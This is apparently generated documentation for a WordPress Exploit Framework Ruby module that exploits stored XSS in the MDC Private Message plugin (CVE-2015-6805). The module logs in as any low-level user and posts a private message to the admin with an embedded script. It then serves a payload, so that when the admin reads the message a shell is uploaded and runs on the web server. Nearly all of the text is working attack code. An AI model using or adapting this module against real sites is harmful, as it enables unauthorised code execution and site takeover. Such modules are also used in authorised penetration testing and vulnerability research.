class Wpxf::Exploit::MdcPrivateMessageXssShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::Xss::new
# File lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb, line 9
def initialize
  super

  update_info(
    name: 'MDC Private Message XSS Shell Upload',
    desc: 'This module exploits a lack of validation in versions '\
          '<= 1.0.0 of the MDC Private Message plugin which '\
          'allows authenticated users of any level to send messages '\
          'containing a script which allows this module to upload and '\
          'execute the payload in the context of the web server once an '\
          'admin reads the message containing the stored script.',
    author: [
      'Chris Kellum', # Vulnerability discovery
      'rastating'     # WPXF module
    ],
    references: [
      ['CVE', '2015-6805'],
      ['WPVDB', '8154'],
      ['EDB', '37907']
    ],
    date: 'Aug 20 2015'
  )

  register_options([
    StringOption.new(
      name: 'username',
      desc: 'The WordPress username to authenticate with',
      required: true
    ),
    StringOption.new(
      name: 'password',
      desc: 'The WordPress password to authenticate with',
      required: true
    ),
    IntegerOption.new(
      name: 'user_id',
      desc: 'The user ID of the user to send the message to',
      default: 1,
      required: true
    ),
    StringOption.new(
      name: 'msg_subject',
      desc: 'The subject of the message that will be sent to the admin',
      required: true,
      default: Utility::Text.rand_alphanumeric(rand(5..20))
    ),
    StringOption.new(
      name: 'msg_body',
      desc: 'The text portion of the message that will be visible to the recipient',
      required: true,
      default: Utility::Text.rand_alphanumeric(rand(10..50))
    ),
  ])
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb, line 64
def check
  check_plugin_version_from_readme('mdc-private-message', '1.0.0.1')
end
msg_body() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb, line 76
def msg_body
  datastore['msg_body']
end
msg_subject() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb, line 72
def msg_subject
  datastore['msg_subject']
end
run() click to toggle source
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb, line 80
def run
  return false unless super

  cookie = authenticate_with_wordpress(datastore['username'], datastore['password'])
  return false unless cookie

  # Success will be determined in another procedure, so initialize to false.
  @success = false

  emit_info 'Storing script...'
  emit_info xss_include_script, true
  res = execute_post_request(
    url: wordpress_url_admin_ajax,
    cookie: cookie,
    body: {
      'action'  => 'mdc_send_msg',
      'from'    =>  user_id.to_s,
      'to'      =>  user_id.to_s,
      'subject' => msg_subject,
      'message' => "#{msg_body}<script>#{xss_include_script}</script>"
    }
  )

  if res.nil?
    emit_error 'No response from the target'
    return false
  end

  if res.code != 200
    emit_error "Server responded with code #{res.code}"
    return false
  end

  emit_success "Script stored and will be executed when the user views the message"
  start_http_server

  return @success
end
user_id() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb, line 68
def user_id
  normalized_option_value('user_id')
end